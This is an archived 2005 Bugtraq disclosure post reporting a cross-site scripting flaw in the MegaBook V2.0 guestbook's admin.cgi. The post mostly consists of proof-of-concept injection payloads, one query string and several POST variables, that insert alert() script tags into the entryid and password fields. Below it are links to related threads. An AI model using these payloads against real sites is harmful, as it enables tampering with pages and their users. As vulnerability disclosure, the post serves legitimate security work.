MegaBook V2.0 - Cross Site Scripting Exploit

From: Spy Hat (spyhat_at_spyhat.com)
Date: 05/05/05

  • Next message: Alexander Kornbrust: "Oracle 9i / 10g Fine Grained Auditing Issue"
    Date: 5 May 2005 10:45:51 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi

    URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)

    I have tested the script with the following query:

    ?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>

    I have also tested the script with theses POST variables:

    action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>

    action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>

    action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>

    action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>

    action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;

    Yours,
    SpyHat


  • Next message: Alexander Kornbrust: "Oracle 9i / 10g Fine Grained Auditing Issue"

    Relevant Pages

    • Re: MegaBook V2.0 - Cross Site Scripting Exploit
      ... The same vulnerability also exist in the new version of MegaBook V2.1 ... >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. ...
      (Bugtraq)
    • Re: MegaBook V2.0 - Cross Site Scripting Exploit
      ... >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. ... >I have also tested the script with theses POST variables: ...
      (Bugtraq)
    • Re: Dynamic form generation
      ... updated structure to replace the table's structure file. ... simple import/export without having to modify any scripts at all. ... whatever database you're using as a backend), display forms, and process ...
      (comp.lang.php)
    • RE: How to add Employee ID field
      ... a cute little dialog box to modify your new attributes. ... 9.Open the Schema console and reload the schema. ... to Visual Basic scripts on drive C:. ... The new attributes (SSN, Employee-Number, and Employee-ID) should ...
      (microsoft.public.windows.server.active_directory)
    • Re: AD Object Attributes
      ... ADModify is exactly what I was looking for! ... > computer account objects. ... >> I need to modify AD attributes by using scripts. ...
      (microsoft.public.win2000.active_directory)